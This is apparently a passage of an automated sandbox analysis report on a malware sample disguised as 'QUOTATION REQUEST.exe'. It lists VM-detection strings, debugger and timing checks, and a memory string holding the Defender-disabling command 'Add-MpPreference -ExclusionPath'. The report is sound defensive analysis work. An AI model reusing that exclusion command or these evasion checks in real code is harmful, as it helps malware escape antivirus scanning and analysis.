Source: explorer.exe, 00000005.00000000.249430731.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000002.494643012.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.250059832.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.241452030.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Code function: 3_2_004088B0 rdtsc

3_2_004088B0

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Code function: 3_2_00409B20 LdrLoadDll,

3_2_00409B20

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FF358 mov eax, dword ptr fs:[00000030h]	9_2_035FF358
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03623B7A mov eax, dword ptr fs:[00000030h]	9_2_03623B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03623B7A mov eax, dword ptr fs:[00000030h]	9_2_03623B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FDB40 mov eax, dword ptr fs:[00000030h]	9_2_035FDB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8B58 mov eax, dword ptr fs:[00000030h]	9_2_036C8B58
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FDB60 mov ecx, dword ptr fs:[00000030h]	9_2_035FDB60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B131B mov eax, dword ptr fs:[00000030h]	9_2_036B131B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]	9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]	9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]	9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]	9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]	9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036203E2 mov eax, dword ptr fs:[00000030h]	9_2_036203E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0361DBE9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036753CA mov eax, dword ptr fs:[00000030h]	9_2_036753CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036753CA mov eax, dword ptr fs:[00000030h]	9_2_036753CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C5BA5 mov eax, dword ptr fs:[00000030h]	9_2_036C5BA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h]	9_2_03624BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h]	9_2_03624BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624BAD mov eax, dword ptr fs:[00000030h]	9_2_03624BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B138A mov eax, dword ptr fs:[00000030h]	9_2_036B138A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AD380 mov ecx, dword ptr fs:[00000030h]	9_2_036AD380
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03601B8F mov eax, dword ptr fs:[00000030h]	9_2_03601B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03601B8F mov eax, dword ptr fs:[00000030h]	9_2_03601B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362B390 mov eax, dword ptr fs:[00000030h]	9_2_0362B390
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622397 mov eax, dword ptr fs:[00000030h]	9_2_03622397
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AB260 mov eax, dword ptr fs:[00000030h]	9_2_036AB260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AB260 mov eax, dword ptr fs:[00000030h]	9_2_036AB260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8A62 mov eax, dword ptr fs:[00000030h]	9_2_036C8A62
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0363927A mov eax, dword ptr fs:[00000030h]	9_2_0363927A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]	9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]	9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]	9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9240 mov eax, dword ptr fs:[00000030h]	9_2_035F9240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BEA55 mov eax, dword ptr fs:[00000030h]	9_2_036BEA55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03684257 mov eax, dword ptr fs:[00000030h]	9_2_03684257
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FAA16 mov eax, dword ptr fs:[00000030h]	9_2_035FAA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FAA16 mov eax, dword ptr fs:[00000030h]	9_2_035FAA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03634A2C mov eax, dword ptr fs:[00000030h]	9_2_03634A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03634A2C mov eax, dword ptr fs:[00000030h]	9_2_03634A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h]	9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov ecx, dword ptr fs:[00000030h]	9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h]	9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F5210 mov eax, dword ptr fs:[00000030h]	9_2_035F5210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03608A0A mov eax, dword ptr fs:[00000030h]	9_2_03608A0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03613A1C mov eax, dword ptr fs:[00000030h]	9_2_03613A1C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAA16 mov eax, dword ptr fs:[00000030h]	9_2_036BAA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAA16 mov eax, dword ptr fs:[00000030h]	9_2_036BAA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622AE4 mov eax, dword ptr fs:[00000030h]	9_2_03622AE4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622ACB mov eax, dword ptr fs:[00000030h]	9_2_03622ACB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0360AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0360AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0362FAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362D294 mov eax, dword ptr fs:[00000030h]	9_2_0362D294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362D294 mov eax, dword ptr fs:[00000030h]	9_2_0362D294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]	9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]	9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]	9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]	9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F52A5 mov eax, dword ptr fs:[00000030h]	9_2_035F52A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361B944 mov eax, dword ptr fs:[00000030h]	9_2_0361B944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361B944 mov eax, dword ptr fs:[00000030h]	9_2_0361B944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB171 mov eax, dword ptr fs:[00000030h]	9_2_035FB171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB171 mov eax, dword ptr fs:[00000030h]	9_2_035FB171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC962 mov eax, dword ptr fs:[00000030h]	9_2_035FC962
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov eax, dword ptr fs:[00000030h]	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03614120 mov ecx, dword ptr fs:[00000030h]	9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362513A mov eax, dword ptr fs:[00000030h]	9_2_0362513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362513A mov eax, dword ptr fs:[00000030h]	9_2_0362513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h]	9_2_035F9100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h]	9_2_035F9100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9100 mov eax, dword ptr fs:[00000030h]	9_2_035F9100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036841E8 mov eax, dword ptr fs:[00000030h]	9_2_036841E8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h]	9_2_035FB1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h]	9_2_035FB1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FB1E1 mov eax, dword ptr fs:[00000030h]	9_2_035FB1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036769A6 mov eax, dword ptr fs:[00000030h]	9_2_036769A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036261A0 mov eax, dword ptr fs:[00000030h]	9_2_036261A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036261A0 mov eax, dword ptr fs:[00000030h]	9_2_036261A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]	9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]	9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]	9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B49A4 mov eax, dword ptr fs:[00000030h]	9_2_036B49A4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]	9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]	9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]	9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036751BE mov eax, dword ptr fs:[00000030h]	9_2_036751BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361C182 mov eax, dword ptr fs:[00000030h]	9_2_0361C182
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A185 mov eax, dword ptr fs:[00000030h]	9_2_0362A185
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622990 mov eax, dword ptr fs:[00000030h]	9_2_03622990
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B2073 mov eax, dword ptr fs:[00000030h]	9_2_036B2073
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1074 mov eax, dword ptr fs:[00000030h]	9_2_036C1074
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03610050 mov eax, dword ptr fs:[00000030h]	9_2_03610050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03610050 mov eax, dword ptr fs:[00000030h]	9_2_03610050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]	9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]	9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]	9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360B02A mov eax, dword ptr fs:[00000030h]	9_2_0360B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]	9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]	9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]	9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]	9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362002D mov eax, dword ptr fs:[00000030h]	9_2_0362002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h]	9_2_03677016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h]	9_2_03677016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677016 mov eax, dword ptr fs:[00000030h]	9_2_03677016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C4015 mov eax, dword ptr fs:[00000030h]	9_2_036C4015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C4015 mov eax, dword ptr fs:[00000030h]	9_2_036C4015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F58EC mov eax, dword ptr fs:[00000030h]	9_2_035F58EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0368B8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h]	9_2_035F40E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h]	9_2_035F40E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F40E1 mov eax, dword ptr fs:[00000030h]	9_2_035F40E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036220A0 mov eax, dword ptr fs:[00000030h]	9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036390AF mov eax, dword ptr fs:[00000030h]	9_2_036390AF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0362F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362F0BF mov eax, dword ptr fs:[00000030h]	9_2_0362F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362F0BF mov eax, dword ptr fs:[00000030h]	9_2_0362F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F9080 mov eax, dword ptr fs:[00000030h]	9_2_035F9080
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03673884 mov eax, dword ptr fs:[00000030h]	9_2_03673884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03673884 mov eax, dword ptr fs:[00000030h]	9_2_03673884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360FF60 mov eax, dword ptr fs:[00000030h]	9_2_0360FF60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8F6A mov eax, dword ptr fs:[00000030h]	9_2_036C8F6A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360EF40 mov eax, dword ptr fs:[00000030h]	9_2_0360EF40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362E730 mov eax, dword ptr fs:[00000030h]	9_2_0362E730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C070D mov eax, dword ptr fs:[00000030h]	9_2_036C070D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C070D mov eax, dword ptr fs:[00000030h]	9_2_036C070D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A70E mov eax, dword ptr fs:[00000030h]	9_2_0362A70E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A70E mov eax, dword ptr fs:[00000030h]	9_2_0362A70E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F4F2E mov eax, dword ptr fs:[00000030h]	9_2_035F4F2E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F4F2E mov eax, dword ptr fs:[00000030h]	9_2_035F4F2E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361F716 mov eax, dword ptr fs:[00000030h]	9_2_0361F716
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368FF10 mov eax, dword ptr fs:[00000030h]	9_2_0368FF10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368FF10 mov eax, dword ptr fs:[00000030h]	9_2_0368FF10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036337F5 mov eax, dword ptr fs:[00000030h]	9_2_036337F5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h]	9_2_03677794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h]	9_2_03677794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03677794 mov eax, dword ptr fs:[00000030h]	9_2_03677794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03608794 mov eax, dword ptr fs:[00000030h]	9_2_03608794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360766D mov eax, dword ptr fs:[00000030h]	9_2_0360766D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]	9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]	9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]	9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]	9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361AE73 mov eax, dword ptr fs:[00000030h]	9_2_0361AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]	9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]	9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]	9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]	9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]	9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03607E41 mov eax, dword ptr fs:[00000030h]	9_2_03607E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAE44 mov eax, dword ptr fs:[00000030h]	9_2_036BAE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BAE44 mov eax, dword ptr fs:[00000030h]	9_2_036BAE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFE3F mov eax, dword ptr fs:[00000030h]	9_2_036AFE3F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h]	9_2_035FC600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h]	9_2_035FC600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FC600 mov eax, dword ptr fs:[00000030h]	9_2_035FC600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03628E00 mov eax, dword ptr fs:[00000030h]	9_2_03628E00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1608 mov eax, dword ptr fs:[00000030h]	9_2_036B1608
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A61C mov eax, dword ptr fs:[00000030h]	9_2_0362A61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A61C mov eax, dword ptr fs:[00000030h]	9_2_0362A61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FE620 mov eax, dword ptr fs:[00000030h]	9_2_035FE620
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036216E0 mov ecx, dword ptr fs:[00000030h]	9_2_036216E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036076E2 mov eax, dword ptr fs:[00000030h]	9_2_036076E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03638EC7 mov eax, dword ptr fs:[00000030h]	9_2_03638EC7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036AFEC0 mov eax, dword ptr fs:[00000030h]	9_2_036AFEC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036236CC mov eax, dword ptr fs:[00000030h]	9_2_036236CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8ED6 mov eax, dword ptr fs:[00000030h]	9_2_036C8ED6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036746A7 mov eax, dword ptr fs:[00000030h]	9_2_036746A7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h]	9_2_036C0EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h]	9_2_036C0EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C0EA5 mov eax, dword ptr fs:[00000030h]	9_2_036C0EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368FE87 mov eax, dword ptr fs:[00000030h]	9_2_0368FE87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361C577 mov eax, dword ptr fs:[00000030h]	9_2_0361C577
